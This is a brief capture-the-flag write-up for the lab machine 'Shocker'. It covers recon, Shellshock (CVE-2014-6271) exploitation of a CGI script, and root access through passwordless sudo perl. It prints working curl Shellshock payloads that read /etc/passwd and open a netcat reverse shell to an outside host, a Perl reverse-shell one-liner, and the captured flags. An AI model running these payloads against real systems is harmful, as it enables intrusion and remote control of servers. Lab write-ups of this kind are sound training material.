This page looks best with JavaScript enabled

Shocker

 ·  ☕ 1 min read  ·  ✍️ M4t35Z

Shocker writeup by M4t35Z

Name Shocker
IP 10.10.10.56
OS Linux
Points Easy(20)

Recon

nmap(fast)
nmap(big)

Web

  • Nothing interesting in the source

ffuf

/cgi-bin

ffuf on cgi-bin/FUZZ.sh
/cgi-bin/user.sh

Name: Shocker -> shellshock

Search for shellshock cve
CVE-2014-6271

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.sh

Shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 1337 >/tmp/f

Pop shell cmd:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 1337 >/tmp/f'" http://10.10.10.56/cgi-bin/user.sh

Got user flag

2ec24e11320026d1e70ff3e16695b233

python3 -c 'import pty;pty.spawn("/bin/bash")'

We can run perl with sudo wo any pw.

sudo perl -e 'use Socket;$i="10.10.14.9";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Got root

52c2715605d70c7619030560dc1ca467
Share on
Support the author with

M4t35Z
WRITTEN BY
M4t35Z